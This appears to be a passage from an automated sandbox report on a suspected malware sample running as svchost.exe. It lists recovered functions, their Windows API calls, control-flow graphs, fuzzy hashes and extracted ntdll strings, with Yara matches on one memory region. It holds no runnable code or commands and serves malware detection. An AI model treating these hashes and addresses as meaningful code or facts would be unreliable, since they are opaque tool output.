                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction ID: d46e80b1df54a4b5232f7abf91cfbbe41bdfd1c9f65068c3eb417ed65bfef87e
                                                                                            • Opcode Fuzzy Hash: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction Fuzzy Hash: 71E04F766406147BD620AA5ADC01F9B776CDFC5710F008429FA0867245CA717A1587A4
                                                                                            Function 03A735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                                            • Instruction ID: 8be3f98a60af97975ec109fd72819471920c05d00907bd7c21b7e5f0758742fa
                                                                                            • Opcode Fuzzy Hash: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                                            • Instruction Fuzzy Hash: 1290023160550802D100B2584554746500A87D0301FA6C412A042456CD8B998A5165B2
                                                                                            Function 03A72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 253 3a72b60-3a72b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                                            • Instruction ID: f2f3aed07c35dfcbf5890919c288cb173e9f7752dfdc21db169de1d2204c02dc
                                                                                            • Opcode Fuzzy Hash: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                                            • Instruction Fuzzy Hash: 43900261202404034105B2584454656800F87E0301B96C022E1014594DCA2989916135
                                                                                            Function 03A72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 254 3a72df0-3a72dfc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                                            • Instruction ID: 7e6c41b1e2a895b3658c0bbefc5c344f7b2255cc5c1d8d85d620e24d36ff4704
                                                                                            • Opcode Fuzzy Hash: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                                            • Instruction Fuzzy Hash: DB90023120140813D111B2584544747400E87D0341FD6C413A042455CD9B5A8A52A131
                                                                                            Function 004140C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: d5ee4f6d8d11858e2d1cd9e3d3ddf78f1b145d0eec5019eb36dc6f777ecdca83
                                                                                            • Instruction ID: 0e7ba57bbf08f8cf937e094f7acc73fd8ddafe8b40a69fe4d4d08c4816e25e7f
                                                                                            • Opcode Fuzzy Hash: d5ee4f6d8d11858e2d1cd9e3d3ddf78f1b145d0eec5019eb36dc6f777ecdca83
                                                                                            • Instruction Fuzzy Hash: 9201E5B2E0021CBEDF11ABE18C81DEF7B7CDF51398F448069FA00A7140D2784E068BA5
                                                                                            Function 00413FE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 413fe8-413ff1 1 413ff3-413ff6 0->1 2 414068 0->2 3 413ff8-414006 1->3 4 41406b-414070 1->4 5 4140aa-4140af 2->5 8 41400a-41400b 3->8 4->5 6 4140b1-4140bb 5->6 7 414128-41412d 5->7 10 41414d-414153 7->10 11 41412f-41413e PostThreadMessageW 7->11 8->8 9 41400d-414016 8->9 12 414018-41401f 9->12 13 41402c 9->13 11->10 14 414140-41414a 11->14 12->13 13->2 14->10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 0-3950405932
                                                                                            • Opcode ID: 4846ca9941c05f8e5ca39dd9d35e072b570077bafd5b6e33e6bd8f103d25cd31
                                                                                            • Instruction ID: 66b714226c07f6b76023ae766c3cef4c6528fc64ce335d79881f425706831973
                                                                                            • Opcode Fuzzy Hash: 4846ca9941c05f8e5ca39dd9d35e072b570077bafd5b6e33e6bd8f103d25cd31
                                                                                            • Instruction Fuzzy Hash: 230144376881447AD710ADDD98839FBFBACDBC6398B518297EA08D7602D10BCC834389
                                                                                            Function 004140C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 30 4140c3-4140d5 31 4140dd-41412d call 42f2d3 call 417883 call 404853 call 424f93 30->31 32 4140d8 call 42e8c3 30->32 42 41414d-414153 31->42 43 41412f-41413e PostThreadMessageW 31->43 32->31 43->42 44 414140-41414a 43->44 44->42
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: e35a5a336d0d5c8e35208002c41e4b4730ec2d6454b82b5d95015dc8577cfaad
                                                                                            • Instruction ID: e7941c6ec000e6bde019c2bf81c06eaf8e375d9f5103b3bd5938ddd83ce7a6dc
                                                                                            • Opcode Fuzzy Hash: e35a5a336d0d5c8e35208002c41e4b4730ec2d6454b82b5d95015dc8577cfaad
                                                                                            • Instruction Fuzzy Hash: F101DBB1D0021C7ADB01ABD19C81DEF7B7CDF41798F448069FA0477141D6784E0687B5
                                                                                            Function 00414082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 45 414082-414100 47 414107-41412d call 424f93 45->47 48 414102 call 404853 45->48 52 41414d-414153 47->52 53 41412f-41413e PostThreadMessageW 47->53 48->47 53->52 54 414140-41414a 53->54 54->52
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: 0fa9b623b37576010f7740d62fe919582528553f5203a7cb275bfc36e0c969bc
                                                                                            • Instruction ID: 77e02313ef0d106aaa381f273370259dcc70c8e69cf0be2693f522135ed40cc4
                                                                                            • Opcode Fuzzy Hash: 0fa9b623b37576010f7740d62fe919582528553f5203a7cb275bfc36e0c969bc
                                                                                            • Instruction Fuzzy Hash: 8CF0E9B290115C7A9F019AE19C81CFFB76CDED1398B44807AFA04E7200D2384E4247A5
                                                                                            Function 004178FE Relevance: 1.6, APIs: 1, Instructions: 58libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 199 4178fe-4178ff 200 417901-417939 199->200 201 4178be-4178c0 199->201 202 4178d0-4178e1 call 42dea3 201->202 203 4178c2-4178cd call 42fdc3 201->203 211 4178e3-4178f7 LdrLoadDll 202->211 212 4178fa-4178fd 202->212 203->202 211->212
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 4a53ede1bae45f6d398f4179464cd6ca97a25b6859c0e85a43f19cf707b38f3e
                                                                                            • Instruction ID: a90f654782f61fbd6731bfaa855a72fbb800df32093ff9bff96c7bdb7bf5be36
                                                                                            • Opcode Fuzzy Hash: 4a53ede1bae45f6d398f4179464cd6ca97a25b6859c0e85a43f19cf707b38f3e
                                                                                            • Instruction Fuzzy Hash: F90149B1A0410A7BEB11EAA09C45FDFB7BCDB51208F40426BF8059B281E235DAC9C795
                                                                                            Function 0042CAD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 234 42cad3-42cb17 call 4048e3 call 42d993 RtlFreeHeap
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,758B0C7D,00000007,00000000,00000004,00000000,0041710C,000000F4), ref: 0042CB12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 63c99f41b55af0cd1ca8660b25d072d20ec73afde797f6f0de5d689eeeccac8e
                                                                                            • Instruction ID: c0661d8aed1aa1d3c53c115302787f5fb8ab18bfce10d22f5e32284c0c1dae7b
                                                                                            • Opcode Fuzzy Hash: 63c99f41b55af0cd1ca8660b25d072d20ec73afde797f6f0de5d689eeeccac8e
                                                                                            • Instruction Fuzzy Hash: 1AE06DB62042057BD710EE59EC41EAB77ADEFC9710F00442DF908A7241CA71BA1087B8
                                                                                            Function 0042CA83 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 229 42ca83-42cac4 call 4048e3 call 42d993 RtlAllocateHeap
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,0041E69E,?,?,00000000,?,0041E69E,?,?,?), ref: 0042CABF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 2f79453456b372df221fd68e69f98eb51f856ab049541b41314eb8c6b47891b1
                                                                                            • Instruction ID: b3df10513e966b1ded1cce422b4e8743eeca37dbb7146ca7b83c8e2e31e65d0c
                                                                                            • Opcode Fuzzy Hash: 2f79453456b372df221fd68e69f98eb51f856ab049541b41314eb8c6b47891b1
                                                                                            • Instruction Fuzzy Hash: 22E06DB62002147BDB10EE5AEC41FDB77ADEFC9710F004429FA08A7241C671B91087B8
                                                                                            Function 0042CB23 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 244 42cb23-42cb5f call 4048e3 call 42d993 ExitProcess
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,8006066B,?,?,8006066B), ref: 0042CB5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 63b94393ee37b62b4f51706b440d581d5114a9a80b6208d11f54f6c77f1153ca
                                                                                            • Instruction ID: 522595a57dd4c80dd30431028f84abfbbfa4f2b893a379ce3d26f53a246e2515
                                                                                            • Opcode Fuzzy Hash: 63b94393ee37b62b4f51706b440d581d5114a9a80b6208d11f54f6c77f1153ca
                                                                                            • Instruction Fuzzy Hash: 82E046BA2002147BD220BA9ADC02F9B776DDBC5754F00442AFA08A7242C770BA0186F5
                                                                                            Function 03A72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 249 3a72c0a-3a72c0f 250 3a72c11-3a72c18 249->250 251 3a72c1f-3a72c26 LdrInitializeThunk 249->251
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                                            • Instruction ID: 6f5e2efa675efa3c8a7ba8ee2e8f84cee8cd93609338ab83b39bb35e1f488e02
                                                                                            • Opcode Fuzzy Hash: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                                            • Instruction Fuzzy Hash: 6AB09B719015C5C5DA11F7604A4C717790967D0701F5AC477D3030645E473DC5D1E175

                                                                                            Non-executed Functions

                                                                                            Function 03AB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2160512332
                                                                                            • Opcode ID: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                                            • Instruction ID: 3085a0817375a896473837cc336847bf042aed95b42707ce3926013e328532a8
                                                                                            • Opcode Fuzzy Hash: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                                            • Instruction Fuzzy Hash: 5D926B75604341ABD720DF24C984BAAB7FCBB84754F084D2FFA949B292D774E844CB92
                                                                                            Function 03A268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-3089669407
                                                                                            • Opcode ID: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                                            • Instruction ID: 4cdf410707c7df4adb26691de4961464925a392cee14cac0e036656063747780
                                                                                            • Opcode Fuzzy Hash: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                                            • Instruction Fuzzy Hash: D48105B2D022187F9B21FB98EED4DEEB7BDAB19654B044527B910F7514D720ED048BA0
                                                                                            Function 03A68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Address of the debug info found in the active list., xrefs: 03AA54AE, 03AA54FA
                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA540A, 03AA5496, 03AA5519
                                                                                            • 8, xrefs: 03AA52E3
                                                                                            • Thread identifier, xrefs: 03AA553A
                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54E2
                                                                                            • Critical section debug info address, xrefs: 03AA541F, 03AA552E
                                                                                            • double initialized or corrupted critical section, xrefs: 03AA5508
                                                                                            • Critical section address., xrefs: 03AA5502
                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 03AA5543
                                                                                            • Critical section address, xrefs: 03AA5425, 03AA54BC, 03AA5534
                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54CE
                                                                                            • Invalid debug info address of this critical section, xrefs: 03AA54B6
                                                                                            • undeleted critical section in freed memory, xrefs: 03AA542B
                                                                                            • corrupted critical section, xrefs: 03AA54C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                            • API String ID: 0-2368682639
                                                                                            • Opcode ID: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                                            • Instruction ID: 9880351710fdf7893f13d613f82f7bd5fea31d2acf8dd7b7dfcf0e71f185574a
                                                                                            • Opcode Fuzzy Hash: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                                            • Instruction Fuzzy Hash: A581BCB5E00758BFDB20CF98C940BAEBBB9FB49704F14415AF518BB241D379A940CB64
                                                                                            Function 03A60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                            • API String ID: 0-360209818
                                                                                            • Opcode ID: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                                            • Instruction ID: 552dca624339f647f9c008a499f4cbc42bbf98bde4bc394d710aa196421673fe
                                                                                            • Opcode Fuzzy Hash: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                                            • Instruction Fuzzy Hash: 77629EB6E006299FDB24CF18C8407A9B7B6EF95320F5982DFD449AB280D7365AD1CF50
                                                                                            Function 03AE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                            • API String ID: 0-3591852110
                                                                                            • Opcode ID: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                                            • Instruction ID: 354955615d5b02836554ef9c6867f6872e4ee4c1aa768de67680e1769748330e
                                                                                            • Opcode Fuzzy Hash: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                                            • Instruction Fuzzy Hash: 6712AC74604662EFD725DF29C441BBABBF5FF0A714F08845EE4968B681D738E880CB60
                                                                                            Function 03A4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                            • API String ID: 0-3197712848
                                                                                            • Opcode ID: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                                            • Instruction ID: 2c5fe55d5829b2facc561aa9e9db98a35adbad48e25e97794b1df0aeab541349
                                                                                            • Opcode Fuzzy Hash: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                                            • Instruction Fuzzy Hash: 6F12F271A083419FD724DF28C540BAAB7E8BFC5708F084A5FF8999B291E774D944CB62
                                                                                            Function 03A2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                            • API String ID: 0-3532704233
                                                                                            • Opcode ID: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                                            • Instruction ID: 727d4895858d08c81bd493feaf36f0f3778aa07cf581a5b26443c63f147fa37d
                                                                                            • Opcode Fuzzy Hash: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                                            • Instruction Fuzzy Hash: E7B1AD729083619FC711EF28C980B6BBBE8BB88754F05492FF899DB341D774D9448B92
                                                                                            Function 03AE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                            • API String ID: 0-1357697941
                                                                                            • Opcode ID: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                                                                            • Instruction ID: eb56436a0fbab5d3218fa807db58635396c5740f78a8e0eddcfe9a1b254c8353
                                                                                            • Opcode Fuzzy Hash: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                                                                            • Instruction Fuzzy Hash: C8F10235A04695EFCB25DF6AC480BAAFBF5FF09704F08805FE4969B282C774A945CB50
                                                                                            Function 03AC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                            • API String ID: 0-3063724069
